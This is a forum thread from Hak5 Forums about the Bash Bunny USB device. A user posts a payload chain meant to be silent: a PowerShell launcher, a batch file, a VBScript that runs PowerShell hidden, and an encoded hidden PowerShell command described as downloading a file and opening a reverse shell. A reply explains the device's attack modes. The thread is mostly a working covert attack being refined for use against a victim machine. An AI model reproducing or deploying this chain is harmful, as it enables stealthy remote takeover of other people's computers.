Jump to content
Hak5 Forums
Sign in to follow this  

ATTACKMODE question / confusion

Recommended Posts

There is something i do not understand while working with the BB.  I am trying to make a payload as silent as possible, and i'm sure i'm doing some stuff which isn't really neccesary.
The payload down below only works when it's in ATTACKMODE HID STORAGE.  Any other ATTACKMODE, it fails to download my file and start a reverse shell.

I do not understand why this is, does anyone has a clarification for me? Because i really fail to understand why.
Also i'm sure i could spawn a reverse shell with a .exe created by unicorn.



RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"




@echo off
cscript %~dp0\i.vbs




command = "powershell.exe -nologo -WindowStyle hidden -command "%~dp0\shell.ps1"
 set shell = CreateObject("WScript.Shell")
 shell.Run command,0




powershell.exe -nologo -WindowStyle Hidden -encodedCommand <<base64 string with ip and download/execute instructions>>


Share this post

Link to post
Share on other sites

SERIAL attackmode puts the bunny in Serial mode...like a com port.  The original payload you posted looks for the Bunny to be mounted as a USB stick (STORAGE).  If it is not mounted as storage, there is no drive labeled BASHBUNNY.  The only way you will get your files you are accessing with SERIAL is you will have to do it serially.  Pretty much have to make a serial server on the BashBunny in Python or whatever to serve/communicate/etc and a serial receiver agent on the victim to receive it to run it.  Do not ask how to do it the serial way I mentioned, it is a long topic best self journeyed to understand and involves programming.

So, HID puts the BB in keyboard mode, STORAGE puts the BB in USB Storage mode, ECM_ETHERNET puts BB in network mode as a ECM compatible network device (mostly Macs and Linux machines), RNDIS_ETHERNET put the BB in network mode RNDIS driver compatible (mainly Windows machines).

Share this post

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.